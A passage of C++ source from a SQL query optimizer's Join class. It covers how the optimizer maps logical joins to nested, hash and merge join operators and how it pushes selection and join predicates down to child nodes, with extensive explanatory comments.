constraint and outer is 1 table if (!hasConstraint && oGrpAttr->getNumBaseTables() == 1) { // use max cardinality estimate outerRows = oGrpAttr->getResultMaxCardinalityForEmptyInput(); } NABoolean favorNJ = CURRSTMT_OPTDEFAULTS->isNestedJoinConsidered() AND (outerRows <= 1) AND GlobalRuleSet->getCurrentPassNumber() > GlobalRuleSet->getFirstPassNumber(); if (favorNJ) return FALSE; // disallow HJ return TRUE; // allow HJ } OperatorTypeEnum Join::getTSJJoinOpType() { switch (getOperatorType()) { case REL_JOIN: case REL_ROUTINE_JOIN: return REL_TSJ; case REL_LEFT_JOIN: return REL_LEFT_TSJ; case REL_SEMIJOIN: return REL_SEMITSJ; case REL_ANTI_SEMIJOIN: return REL_ANTI_SEMITSJ; default: ABORT("Unsupported join type in Join::getTSJJoinOpType()"); return REL_NESTED_JOIN; // Return makes MSVC happy. } // switch } // Join::getNestedJoinOpType() OperatorTypeEnum Join::getNestedJoinOpType() { switch (getOperatorType()) { case REL_JOIN: case REL_ROUTINE_JOIN: case REL_TSJ: return REL_NESTED_JOIN; case REL_LEFT_JOIN: case REL_LEFT_TSJ: return REL_LEFT_NESTED_JOIN; case REL_SEMIJOIN: case REL_SEMITSJ: return REL_NESTED_SEMIJOIN; case REL_ANTI_SEMIJOIN: case REL_ANTI_SEMITSJ: return REL_NESTED_ANTI_SEMIJOIN; default: ABORT("Unsupported join type in Join::getNestedJoinOpType()"); return REL_NESTED_JOIN; // Return makes MSVC happy. } // switch } // Join::getNestedJoinOpType() OperatorTypeEnum Join::getHashJoinOpType(NABoolean isNoOverflow) { if(isNoOverflow) { switch (getOperatorType()) { case REL_JOIN: return REL_ORDERED_HASH_JOIN; case REL_LEFT_JOIN: return REL_LEFT_ORDERED_HASH_JOIN; case REL_SEMIJOIN: return REL_ORDERED_HASH_SEMIJOIN; case REL_ANTI_SEMIJOIN: return REL_ORDERED_HASH_ANTI_SEMIJOIN; default: ABORT("Unsupported join type in Join::getHashJoinOpType()"); return REL_ORDERED_HASH_JOIN; // return makes MSVC happy. } // switch } else { switch (getOperatorType()) { case REL_JOIN: return REL_HYBRID_HASH_JOIN; case REL_LEFT_JOIN: return REL_LEFT_HYBRID_HASH_JOIN; case REL_FULL_JOIN: return REL_FULL_HYBRID_HASH_JOIN; case REL_SEMIJOIN: return REL_HYBRID_HASH_SEMIJOIN; case REL_ANTI_SEMIJOIN: return REL_HYBRID_HASH_ANTI_SEMIJOIN; default: ABORT("Unsupported join type in Join::getHashJoinOpType()"); return REL_HYBRID_HASH_JOIN; // return makes MSVC happy. } // switch }//else } // Join::getHashJoinOpType() NABoolean Join::isCrossProduct() const { // only for our beloved inner non semi joins (for now) if (NOT isInnerNonSemiJoin()) return FALSE; ValueIdSet VEGEqPreds; ValueIdSet newJoinPreds = getSelectionPred(); newJoinPreds += getJoinPred(); // ----------------------------------------------------------------- // Find all the VEGPreds in the newJoinPreds. // Remove all the ones that are not true join predicates // (i.e. they are covered by the inputs, or one of the // children cannot produce it) // ----------------------------------------------------------------- newJoinPreds.lookForVEGPredicates(VEGEqPreds); // remove those VEGPredicates that are covered by the input values VEGEqPreds.removeCoveredExprs(getGroupAttr()-> getCharacteristicInputs()); VEGEqPreds.removeUnCoveredExprs(child(0).getGroupAttr()-> getCharacteristicOutputs()); VEGEqPreds.removeUnCoveredExprs(child(1).getGroupAttr()-> getCharacteristicOutputs()); if (VEGEqPreds.isEmpty()) return TRUE; // is a cross product else return FALSE; } NABoolean Join::isOuterJoin() const { if(isLeftJoin() || isRightJoin() || isFullOuterJoin()) return TRUE; return FALSE; } NABoolean RelExpr::isAnyJoin() const { switch (getOperatorType()) { case REL_JOIN: case REL_ROUTINE_JOIN: case REL_LEFT_JOIN: case REL_ANY_JOIN: case REL_ANY_TSJ: case REL_ANY_INNER_JOIN: case REL_ANY_NON_TS_INNER_JOIN: case REL_ANY_NON_TSJ_JOIN: case REL_ANY_LEFT_JOIN: case REL_ANY_LEFT_TSJ: case REL_ANY_NESTED_JOIN: case REL_ANY_HASH_JOIN: case REL_ANY_MERGE_JOIN: case REL_FORCE_JOIN: case REL_FORCE_NESTED_JOIN: case REL_FORCE_HASH_JOIN: case REL_FORCE_ORDERED_HASH_JOIN: case REL_FORCE_HYBRID_HASH_JOIN: case REL_FORCE_MERGE_JOIN: case REL_INTERSECT: case REL_EXCEPT: return TRUE; default: return FALSE; } } NABoolean Join::isInnerNonSemiJoinWithNoPredicates() const { if (isInnerNonSemiJoin() AND getSelectionPred().isEmpty() AND getJoinPred().isEmpty()) return TRUE; else return FALSE; } NABoolean Join:: isInnerJoin() const { return getOperator().match(REL_ANY_INNER_JOIN); } NABoolean Join::isInnerNonSemiJoin() const { return getOperator().match(REL_ANY_INNER_JOIN) AND NOT getOperator().match(REL_ANY_SEMIJOIN); } NABoolean Join::isInnerNonSemiNonTSJJoin() const { return (getOperator().match(REL_ANY_INNER_JOIN) AND NOT getOperator().match(REL_ANY_SEMIJOIN)) AND NOT getOperator().match(REL_ANY_TSJ); } NABoolean Join::isLeftJoin() const { return getOperator().match(REL_ANY_LEFT_JOIN); } NABoolean Join::isRightJoin() const { return getOperator().match(REL_ANY_RIGHT_JOIN); } NABoolean Join::isFullOuterJoin() const { return (getOperator().match(REL_ANY_FULL_JOIN)); } NABoolean Join::isSemiJoin() const { return getOperator().match(REL_ANY_SEMIJOIN); } NABoolean Join::isAntiSemiJoin() const { return getOperator().match(REL_ANY_ANTI_SEMIJOIN); } NABoolean Join::isTSJ() const { return getOperator().match(REL_ANY_TSJ); } NABoolean Join::isRoutineJoin() const { return (getOperator() == REL_ROUTINE_JOIN); } NABoolean Join::isNonRoutineTSJ() const { return ( getOperator().match(REL_ANY_TSJ) && ( getOperator() != REL_ROUTINE_JOIN)); } NABoolean Join::isNestedJoin() const { return getOperator().match(REL_ANY_NESTED_JOIN); } NABoolean Join::isHashJoin() const { return getOperator().match(REL_ANY_HASH_JOIN); } OperatorTypeEnum Join::getBaseHashType() const { switch (getOperatorType()) { case REL_HASH_JOIN: case REL_LEFT_HASH_JOIN: case REL_HASH_SEMIJOIN: case REL_HASH_ANTI_SEMIJOIN: case REL_ANY_HASH_JOIN: return REL_HASH_JOIN; case REL_HYBRID_HASH_JOIN: case REL_LEFT_HYBRID_HASH_JOIN: case REL_FULL_HYBRID_HASH_JOIN: case REL_HYBRID_HASH_SEMIJOIN: case REL_HYBRID_HASH_ANTI_SEMIJOIN: return REL_HYBRID_HASH_JOIN; case REL_ORDERED_HASH_JOIN: case REL_LEFT_ORDERED_HASH_JOIN: case REL_ORDERED_HASH_SEMIJOIN: case REL_ORDERED_HASH_ANTI_SEMIJOIN: return REL_ORDERED_HASH_JOIN; default: return INVALID_OPERATOR_TYPE; } // switch } // Join::getBaseHashType NABoolean Join::isMergeJoin() const { return getOperator().match(REL_ANY_MERGE_JOIN); } OperatorTypeEnum Join::getMergeJoinOpType() { switch (getOperatorType()) { case REL_JOIN: return REL_MERGE_JOIN; case REL_LEFT_JOIN: return REL_LEFT_MERGE_JOIN; case REL_SEMIJOIN: return REL_MERGE_SEMIJOIN; case REL_ANTI_SEMIJOIN: return REL_MERGE_ANTI_SEMIJOIN; default: ABORT("Unsupported join type in Join::getMergeJoinOpType()"); return REL_MERGE_JOIN; // return makes MSVC happy. } // switch } // Join::getMergeJoinOpType() void Join::pushdownCoveredExpr(const ValueIdSet & outputExpr, const ValueIdSet & newExternalInputs, ValueIdSet & predicatesOnParent, const ValueIdSet * setOfValuesReqdByParent, Lng32 childIndex ) { #ifdef NDEBUG NAString pushdownDebugStr(CmpCommon::statementHeap()); #define PUSHDOWN_DEBUG_SAVE(str) #else Int32 PUSHDOWN_DEBUG = !!getenv("PUSHDOWN_DEBUG"); NAString pushdownDebugStr, pushdownDebugTmp; #define PUSHDOWN_DEBUG_SAVE(str) \ { if (PUSHDOWN_DEBUG) \ { pushdownDebugTmp = ""; \ predicatesOnParent.unparse(pushdownDebugTmp); \ pushdownDebugStr += NAString("\n") + str + ": " + pushdownDebugTmp; \ if (PUSHDOWN_DEBUG == 99) cerr << pushdownDebugStr << endl; \ } \ } PUSHDOWN_DEBUG_SAVE("J1"); #endif // ---------------------------------------------------------------------- // Note: Normally, predicatesOnParent is the set of predicates to be // considered for pushing down. For most of the other nodes, this set // is usually just the set (or maybe a subset) of selection predicates // the node has. However, a Join node distinguishes between selection // predicates (which are specified in the WHERE clause of a SQL query) // and join predicates (which are specified in the ON clause). The two // types of predicates have different criteria (as we will see later) // to satisfy in order to be pushed down. The predicatesOnParent supplied // are treated as selection predicates for the purpose of consideration // for pushing down. Note also that this procedure also considers the // pushing down of join predicates (as in joinPred_ of Join). // ---------------------------------------------------------------------- // This method only supports pushing predicates down to both children, // but not only to one specified. // CMPASSERT(childIndex < 0); NABoolean isATSJFlag = isTSJ(); ValueIdSet exprOnParent ; if (setOfValuesReqdByParent) exprOnParent = *setOfValuesReqdByParent; if (isFullOuterJoin()) { // For Full Outer Join, we cannot push down the selctionPred() // or the joinPred() to either child0 or child1. // Note that for FOJ, predicates are not pulled up. // --------------------------------------------------------------------- // STEP 1: We cannot pushdown join predicates to either child, // so compute values required to evaluate the joinPred() // here at the parent (the Join) and add // it to exprOnParent. // // --------------------------------------------------------------------- computeValuesReqdForPredicates(joinPred(), exprOnParent, TRUE); // --------------------------------------------------------------------- // STEP 2: We cannot pushdown selectionPred() to either child, // so compute values required to evaluate the selectionPred() // here at the parent (the Join) and add // it to exprOnParent. // // --------------------------------------------------------------------- computeValuesReqdForPredicates(selectionPred(), exprOnParent, TRUE); // --------------------------------------------------------------------- // STEP 3: Calling pushdownCoveredExpr on an empty set, so that the child // inputs and outputs are set properly. // --------------------------------------------------------------------- ValueIdSet emptySet; RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, emptySet, &exprOnParent, 0); // --------------------------------------------------------------------- // STEP 4: Calling pushdownCoveredExpr on an empty set, so that the child // inputs and outputs are set properly. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, emptySet, &exprOnParent, 1); } // if (isFullOuterJoin()) // ----------------------------------------------------------------------- // It might not be obvious, but it turns out that pushing down of // predicates in a Left Join is quite similar to that in an Anti-Semi // Join. One striking similarity is that the join predicates cannot be // pushed down to the left child. In both cases, pushing down join preds // filters out rows from the left child which shouldn't be filtered out. // In the case of Left Join, those rows should be null-instantiated while // in the case of Anti-Semi Join, they are exactly the set of rows which // we *should* return. (An Anti-Semi Join returns rows from the left // which do *not* join with rows from the right). // ----------------------------------------------------------------------- else if ((isLeftJoin() || isAntiSemiJoin()) && (!isFullOuterJoin())) { // --------------------------------------------------------------------- // STEP 1: Try to push down the given predicatesOnParent to first child. // --------------------------------------------------------------------- // --------------------------------------------------------------------- // STEP 1A: Gather all values the left child must still produce even if // predicates are pushed down. // // Selection predicates can only be pushed to the first child of an // outer join. Join predicates can only be pushed to the second. Make // sure the first child produces what we need for the join predicates. // --------------------------------------------------------------------- computeValuesReqdForPredicates(joinPred(), exprOnParent); // --------------------------------------------------------------------- // If this is a TSJ, the left child should also produce those values // that the parent needs to give as inputs to the second child. // --------------------------------------------------------------------- if (isATSJFlag) exprOnParent += child(1).getGroupAttr()->getCharacteristicInputs(); // --------------------------------------------------------------------- // This seems to be the only difference between the case of a Left Join // and the case of a Anti-Semi Join. For an Anti-Semi Join, selection // predicates should be in terms of columns on the left child only (by // definition). Therefore, we don't have to worry about retaining things // like VEGPred(VEG{T1.a,T2.a}). // --------------------------------------------------------------------- ValueIdSet VEGEqPreds1; if (isLeftJoin()) { // --------------------------------------------------------------------- // Find all the VEGPreds in predicatesOnParent. VEGPred(VEG{T1.a,T2.a}) // will be pushed down to Scan T1 even if T2.a is not available there. // Therefore, we still need to keep a copy of this type of predicates // here at this Join node where both T1.a and T2.a will be available. // --------------------------------------------------------------------- predicatesOnParent.lookForVEGPredicates(VEGEqPreds1); // --------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T1.a,3}) needn't be retained at this Join node after it's // pushed down to Scan T1. // --------------------------------------------------------------------- VEGEqPreds1.removeCoveredExprs(newExternalInputs); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at second child. For // example VEGPred(VEG{T1.a,T2.a}) in JOIN2 of ((T1 JOIN1 T2) JOIN2 T3) // is not covered at the second child. The predicate should be pushed // down to the first child without being retained at JOIN2. Note that // since predicatesOnParent are selection predicates evaluated after // a Left Join, they are in terms of the null-instantiated outputs from // the Join rather than direct outputs from the second child. // --------------------------------------------------------------------- VEGEqPreds1.removeUnCoveredExprs(nullInstantiatedOutput()); PUSHDOWN_DEBUG_SAVE("J2"); // --------------------------------------------------------------------- // ??? First child not needed ??? since we are trying to push down to // child0, if it's uncovered, it wouldn't be pushed down anyway. //VEGEqPreds1.removeUnCoveredExprs( // child(0).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // --------------------------------------------------------------------- // Since these VEGEqPreds1 will be added back to predicatesOnParent // after the attempt to push down to first child, make sure the first // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds1, exprOnParent); } // endif (isLeftJoin()) // --------------------------------------------------------------------- // STEP 1B: Perform pushdown to the first child, and add VEGEqPreds // back to predicatesOnParent after the push down. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predicatesOnParent, &exprOnParent, 0); // --------------------------------------------------------------------- // All selection predicates could be pushed to the first child for an // Anti-Semi Join should those predicates should involve columns from // the second child by definition. // --------------------------------------------------------------------- if (isAntiSemiJoin()) { CMPASSERT(predicatesOnParent.isEmpty() // QSTUFF OR getGroupAttr()->isGenericUpdateRoot() // QSTUFF ); } else predicatesOnParent += VEGEqPreds1; PUSHDOWN_DEBUG_SAVE("J3"); // --------------------------------------------------------------------- // STEP 2: Try to push down the join predicates to second child. // --------------------------------------------------------------------- // --------------------------------------------------------------------- // STEP 2A: Gather all values the second child must still produce even // if predicates are pushed down. Start with all the required // values specified by the caller of this method. // --------------------------------------------------------------------- if (setOfValuesReqdByParent) exprOnParent = *setOfValuesReqdByParent; else exprOnParent.clear(); // --------------------------------------------------------------------- // Since the remaining predicatesOnParent could not be pushed down to // the second child and must be evaluated on the Left Join, values reqd // for their evaluation must be included to make sure the second child // produces them. For Anti-Semi Join, predicatesOnParent is empty. // --------------------------------------------------------------------- ValueIdSet inputs = newExternalInputs; ValueIdSet inputsTakenOut; if (isLeftJoin()) { computeValuesReqdForPredicates(predicatesOnParent, exprOnParent); // ------------------------------------------------------------------- // Special case: If this left join is the right child of a Nested // Join, it could happen that the inputs we get from above already // contains a value which our push down logic considers to have // covered the predicatesOnParent which we don't attempt to push // down. This is a very peculiar failure of our cover logic, where // the predicates should have been pushed down but held back cos of // the semantics of an operator (case in point, the left join). To // deal with this, we remove from the available inputs to my child // those values so that the child will produce this as an output. // ------------------------------------------------------------------- // inputTakenOut = inputs; // predicatesOnParent.weedOutUnreferenced(inputsTakenOut); // inputs -= inputsTakenOut; } // --------------------------------------------------------------------- // Also, if this is NOT a TSJ, there are some join predicates which need // to be retained even if they are pushed down to the second child. All // Join predicates are pushable to the second child of a TSJ without // being retained at the TSJ. (See later for an exception) // --------------------------------------------------------------------- ValueIdSet VEGEqPreds2; ValueIdSet availableInputs = inputs; if (isATSJFlag) { availableInputs += child(0).getGroupAttr()->getCharacteristicOutputs(); } else { // ------------------------------------------------------------------- // First, find all the VEGPreds in join predicates. This is similar to // what we did above with predicatesOnParent. VEGPred(VEG{T1.a,T2.a}) // will be pushed down to Scan T2 even if T1.a is not available there. // Therefore, we still need to keep a copy of this type of predicates // here at this Join node where both T1.a and T2.a will be available. // ------------------------------------------------------------------- joinPred().lookForVEGPredicates(VEGEqPreds2); // ------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T2.a,3}) needn't be retained at this Join node after // pushed down to Scan T2. (There is an exception to this. See later.) // ------------------------------------------------------------------- VEGEqPreds2.removeCoveredExprs(availableInputs); //newExternalInputs // ------------------------------------------------------------------- // Remove those VEGPreds which are not covered at first child. For // example VEGPred(VEG{T2.a,T3.a}) in JOIN1 of (T1 JOIN1 (T2 JOIN2 T3)) // is not covered at the first child. The predicate could be pushed // down to the second child without being retained at JOIN2. // ------------------------------------------------------------------- VEGEqPreds2.removeUnCoveredExprs( child(0).getGroupAttr()->getCharacteristicOutputs()); // ------------------------------------------------------------------- // Since these predicates will be added back to the join predicates // after the attempt to push down to second child, make sure the second // child produces the required values to evaluate them. // ------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds2, exprOnParent); } // --------------------------------------------------------------------- // Now, there are additional join predicates that must be retained // even if they are pushable to the second child. An example would be // VEGPred(VEG{T1.a,T2.a,10}). For an inner join, this predicate can // be pushed to Scan T1 and Scan T2 and evaluated as (T1.a=10) and // (T2.a=10) respectively. However, for a Left Join or Anti-Semi Join, // this predicate (if it's a join predicate) cannot be pushed down to // the first child. The (T1.a=10) part must then be retained at this // Join node. These types of VEGPreds are those covered by T1 and the // external inputs. // --------------------------------------------------------------------- ValueIdSet joinPredsThatStay; joinPredsThatStay = joinPred(); ValueIdSet availableValues = availableInputs; //newExternalInputs availableValues += child(0).getGroupAttr()->getCharacteristicOutputs(); joinPredsThatStay.removeUnCoveredExprs(availableValues); // --------------------------------------------------------------------- // However, we don't want VEGPred like VEGPred(VEG{T2.a,10}) which // actually does not reference an output of T1. // --------------------------------------------------------------------- joinPredsThatStay.removeUnReferencedVEGPreds( child(0).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Also, if some inputs have been taken out deliberately, we want to // make sure other predicates which references the inputs taken out // are going to stay. Otherwise, we will have the issue that not // sufficient values are available at the child to ensure correctness // in evaluating the predicates pushed down to it. The same predicate // must be re-evaluated at this JOIN node. // --------------------------------------------------------------------- if (NOT inputsTakenOut.isEmpty()) { ValueIdSet moreJoinPredsThatStay; joinPred().lookForVEGPredicates(moreJoinPredsThatStay); moreJoinPredsThatStay.removeUnReferencedVEGPreds(inputsTakenOut); joinPredsThatStay += moreJoinPredsThatStay; } // --------------------------------------------------------------------- // Since these predicates will be added back to the join predicates // after the attempt to push down to second child, make sure the second // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(joinPredsThatStay, exprOnParent); //---------------------------------------------------------------------- // Solution 10-030728-8252: check if the second child could produce // expressions of type Instnull(CAST(aggregate)). // See if the CAST could be pushed // up. The Groupby node does not manufacture expressions of the type // cast(aggregate) as outputs in the generator. So do not ask for them //---------------------------------------------------------------------- exprOnParent.replaceInstnullCastAggregateWithAggregateInLeftJoins(this); // --------------------------------------------------------------------- // STEP 2B: Perform pushdown to the second child, and add reqd preds // back to the join predicates after the push down. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, availableInputs, joinPred(), &exprOnParent, 1); // --------------------------------------------------------------------- // Add back those predicates which must stay with the JOIN even after // they are pushed to the second child. // --------------------------------------------------------------------- joinPred() += VEGEqPreds2; joinPred() += joinPredsThatStay; PUSHDOWN_DEBUG_SAVE("J4"); } else // ----------------------------------------------------------------------- // For other types of Join's: Semi and Inner (either TSJ or non-TSJ), // processing is quite similar. Inner Joins has no join prediciates. For // Semi-Join, although we distinguish between join predicates and // selection predicates, both types of predicates are equally pushable. // The only thing is "true join VEGPreds" like VEGPred(VEG{T1.a,T2.a}) // should be retained as join predicates in a Semi-Join but as selection // predicates in an Inner Join after being pushed down. // ----------------------------------------------------------------------- { ValueIdSet predicates1 = predicatesOnParent; ValueIdSet predicates2 = predicatesOnParent; if (isSemiJoin()) { // Join predicates in a Semi-Join are "as pushable as" its selection // predicates. // predicates1 += joinPred(); predicates2 += joinPred(); } else { // Inner Join should have no join predicates. CMPASSERT(joinPred().isEmpty() // QSTUFF OR getGroupAttr()->isGenericUpdateRoot() // QSTUFF ); } // --------------------------------------------------------------------- // STEP 1: Gather all values the children must still produce even if // predicates are pushed down. // // Find all the "true join VEGPreds" in predicates. E.g, VEGPred(VEG{ // T1.a,T2.a}) will be pushed down to Scan T1 and to Scan T2 even if // not both values are availble at either node. Therefore, we still // need to keep a copy of this type of predicates here at this Join node // where both T1.a and T2.a will be available. That means the children // need to provide these values to the Join node. The only exception is // when we are doing a TSJ. The predicates are then all pushed to the // right child, and the right child could then *not* provide the value // to the Join node if it's not a required output from the Join. // --------------------------------------------------------------------- ValueIdSet VEGEqPreds; predicates1.lookForVEGPredicates(VEGEqPreds); // --------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T1.a,3}) needn't be retained at this Join node after // it's pushed down to Scan T1. // --------------------------------------------------------------------- VEGEqPreds.removeCoveredExprs(newExternalInputs); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at first child. For // example VEGPred(VEG{T2.a,T3.a}) in JOIN1 of (T1 JOIN1 (T2 JOIN2 T3)) // is not covered at the first child. The predicate could be pushed // down to the second child without being retained at JOIN2. // --------------------------------------------------------------------- VEGEqPreds.removeUnCoveredExprs( child(0).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at second child. For // example VEGPred(VEG{T1.a,T2.a}) in JOIN2 of ((T1 JOIN1 T2) JOIN2 T3) // is not covered at the second child. The predicate could be pushed // down to the first child without being retained at JOIN2. // --------------------------------------------------------------------- VEGEqPreds.removeUnCoveredExprs( child(1).getGroupAttr()->getCharacteristicOutputs()); // --------------------------------------------------------------------- // Since these predicates will be retained at the Join (or pushed down // to the second child in the case of a TSJ), make sure the first // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds, exprOnParent); // --------------------------------------------------------------------- // First child of a TSJ should produce inputs required from the second // child as well. // --------------------------------------------------------------------- if (isATSJFlag) exprOnParent += child(1).getGroupAttr()->getCharacteristicInputs(); // --------------------------------------------------------------------- // STEP 2: Try pushing down to the first child. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predicates1, &exprOnParent, 0); PUSHDOWN_DEBUG_SAVE("J5"); // --------------------------------------------------------------------- // Find subset of predicatesOnParent which have *not* been pushed down // to first child. // --------------------------------------------------------------------- predicatesOnParent.intersectSet(predicates1); PUSHDOWN_DEBUG_SAVE("J6"); // --------------------------------------------------------------------- // For a Semi-Join, all selection predicates (which should not involve // columns from the second child) should be pushed down to the first // child by now. Also get rid of the join predicates which have been // pushed down. // --------------------------------------------------------------------- if (isSemiJoin()) { joinPred().intersectSet(predicates1); CMPASSERT(predicatesOnParent.isEmpty() // QSTUFF OR getGroupAttr()->isGenericUpdateRoot() // QSTUFF ); } // --------------------------------------------------------------------- // If this is a TSJ, we do not even need to retain VEGEqPreds at the // Join. Everything remaining should be pushable to the right child. // Therefore, we don't need the right child to output values required // for evaluating VEGEqPreds, unless it's an required output from the // // We do not want to push the predicate down to the right child now for // the RoutineJoin. That will happen later when the RoutineJoin gets // transfered back to a TSJ/nested join by the optimizer impl rules. // // The reason we don't want it pushed here is so that the analyzer does // not have to differentiate what imputs are required for predicates and // which is required for a UDF. By knowing what inputs are required for // the UDF, the analyzer can determine if there is a different join order // that might be cheaper. We will attempt to push the predicate during // the optimizer phase.. // --------------------------------------------------------------------- if (!isRoutineJoin()) { ValueIdSet availableInputs = newExternalInputs; if (isATSJFlag) { if (setOfValuesReqdByParent) exprOnParent = *setOfValuesReqdByParent; else exprOnParent.clear(); availableInputs += child(0).getGroupAttr()->getCharacteristicOutputs(); } // --------------------------------------------------------------------- // STEP 3: Try pushing to second child now. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, availableInputs, predicates2, &exprOnParent, 1); } // --------------------------------------------------------------------- // Find subset of predicatesOnParent which have *not* been pushed down // to second child. // --------------------------------------------------------------------- predicatesOnParent.intersectSet(predicates2); PUSHDOWN_DEBUG_SAVE("J7"); if (isSemiJoin()) { // ------------------------------------------------------------------- // set joinPred to have those predicates that were not pushed down to // the second child. // ------------------------------------------------------------------- joinPred().intersectSet(predicates2); // ------------------------------------------------------------------- // If this is a semi-join that is not a TSJ we need to add all the // true join VEGPreds back to joinPred(). // ------------------------------------------------------------------- if (NOT isATSJFlag) joinPred() += VEGEqPreds; else // ----------------------------------------------------------------- // If it is a TSJ all join predicates should be pushable, no preds // should be remaining in joinPred(). // ----------------------------------------------------------------- CMPASSERT(joinPred().isEmpty() // QSTUFF OR getGroupAttr()->isGenericUpdateRoot() // QSTUFF ); } else { // ------------------------------------------------------------------- // If this is a inner-join that is not a TSJ we need to add all the // true join VEGPreds back to selection predicates. // ------------------------------------------------------------------- if (NOT isATSJFlag OR isRoutineJoin()) { predicatesOnParent += VEGEqPreds; PUSHDOWN_DEBUG_SAVE("J9"); } else // ----------------------------------------------------------------- // If it is a TSJ all selection predicates should be pushable, no // preds should remain. // ----------------------------------------------------------------- CMPASSERT(predicatesOnParent.isEmpty() // QSTUFF OR getGroupAttr()->isGenericUpdateRoot() // QSTUFF ); } } } // Join::pushdownCoveredExpr // -------------------------------------------------------------------------- // Join::pushdownCoveredExprSQO // Rules for pushdown from Join during the SemanticQueryOptimize(SQO) // subphase are different in two ways from the usual. // 1) If left child does not cover any part of a // VEGPred it will still be retained in the Join, so that it can be pulled // further up the query tree as we apply this transformation at other levels // In the usual rules, the VEGPred will be pushed down to the right child // without being retained at the Join. This behaviour is controlled by the // boolean input parameter keepPredsNotCoveredByChild0. Similarly preds not // covered by the right child can also be retained at the Join. This is // controlled by keepPredsNotCoveredByChild1. // 2) If left child is a semiJoin or a TSJ we do not push any predicates // down that side as those selection predicates are supposed to be empty // at this phase of compilation. // --------------------------------------------------------------------------- void Join::pushdownCoveredExprSQO(const ValueIdSet & outputExpr, const ValueIdSet & newExternalInputs, ValueIdSet & predicatesOnParent, ValueIdSet & setOfValuesReqdByParent, NABoolean keepPredsNotCoveredByChild0, NABoolean keepPredsNotCoveredByChild1 ) { ValueIdSet exprOnParent1 = setOfValuesReqdByParent; ValueIdSet exprOnParent = setOfValuesReqdByParent; ValueIdSet exprOnParent2 = setOfValuesReqdByParent; ValueIdSet predicates1 = predicatesOnParent; ValueIdSet predicates2 = predicatesOnParent; if (isLeftJoin()) { // --------------------------------------------------------------------- // STEP 1: Try to push down the given predicatesOnParent to first child. // --------------------------------------------------------------------- // --------------------------------------------------------------------- // STEP 1A: Gather all values the left child must still produce even if // predicates are pushed down. // // Selection predicates can only be pushed to the first child of an // outer join. Join predicates can only be pushed to the second. Make // sure the first child produces what we need for the join predicates. // --------------------------------------------------------------------- computeValuesReqdForPredicates(joinPred(), exprOnParent); ValueIdSet VEGEqPreds1; // --------------------------------------------------------------------- // Find all the VEGPreds in predicatesOnParent. VEGPred(VEG{T1.a,T2.a}) // will be pushed down to Scan T1 even if T2.a is not available there. // Therefore, we still need to keep a copy of this type of predicates // here at this Join node where both T1.a and T2.a will be available. // --------------------------------------------------------------------- predicatesOnParent.lookForVEGPredicates(VEGEqPreds1); // --------------------------------------------------------------------- // Remove those VEGPreds that are covered by the input values, since // VEGPred(VEG{T1.a,3}) needn't be retained at this Join node after it's // pushed down to Scan T1. // --------------------------------------------------------------------- VEGEqPreds1.removeCoveredExprs(newExternalInputs); // --------------------------------------------------------------------- // Remove those VEGPreds which are not covered at second child. For // example VEGPred(VEG{T1.a,T2.a}) in JOIN2 of ((T1 JOIN1 T2) JOIN2 T3) // is not covered at the second child. The predicate should be pushed // down to the first child without being retained at JOIN2. Note that // since predicatesOnParent are selection predicates evaluated after // a Left Join, they are in terms of the null-instantiated outputs from // the Join rather than direct outputs from the second child. // --------------------------------------------------------------------- if (NOT keepPredsNotCoveredByChild1) VEGEqPreds1.removeUnCoveredExprs(nullInstantiatedOutput()); // --------------------------------------------------------------------- // Since these VEGEqPreds1 will be added back to predicatesOnParent // after the attempt to push down to first child, make sure the first // child produces the required values to evaluate them. // --------------------------------------------------------------------- computeValuesReqdForPredicates(VEGEqPreds1, exprOnParent); // --------------------------------------------------------------------- // STEP 1B: Perform pushdown to the first child, and add VEGEqPreds // back to predicatesOnParent after the push down. // --------------------------------------------------------------------- RelExpr::pushdownCoveredExpr(outputExpr, newExternalInputs, predicatesOnParent, &exprOnParent, 0); // --------------------------------------------------------------------- // All selection predicates could be pushed to the first child for an // Anti-Semi Join should those predicates should involve columns from // the second child by definition. // --------------------------------------------------------------------- predicatesOnParent += VEGEqPreds1; // --------------------------------------------------------------------- // STEP 2: Try to push down the join predicates to second child. // --------------------------------------------------------------------- // --------------------------------------------------------------------- // STEP 2A: Gather all values the second child must still produce even // if predicates are pushed down. Start with all the required // values specified by the caller of this method. // --------------------------------------------------------------------- exprOnParent = outputExpr; // --------------------------------------------------------------------- // Since the remaining predicatesOnParent could not be pushed down to // the second child and must be evaluated on the Left Join, values reqd // for their evaluation must be included to make sure the second child // produces them. For Anti-Semi Join, predicatesOnParent is empty. // --------------------------------------------------------------------- ValueIdSet inputs = newExternalInputs; ValueIdSet inputsTakenOut; computeValuesReqdForPredicates(predicatesOnParent, exprOnParent); // --------------------------------------------------------------------- // Also, if this is NOT a TSJ, there are some join predicates which need // to be retained even if they are pushed down to the second child. All // Join predicates are pushable to the second child of a TSJ without // being retained at the TSJ. (See later for an exception) // --------------------------------------------------------------------- ValueIdSet VEGEqPreds2; ValueIdSet availableInputs = inputs; // ------------------------------------------------------------------- // First, find all the VEGPreds in join predicates. This is similar to // what we did above with predicatesOnParent. VEGPred(VEG{T1.a,T2.a}) // will be pushed down to Scan T2 even if T1.a is not available there. // Therefore, we still need to keep a copy of this type of predicates // here at this Join node where both T1.a and T2.a will be available. // 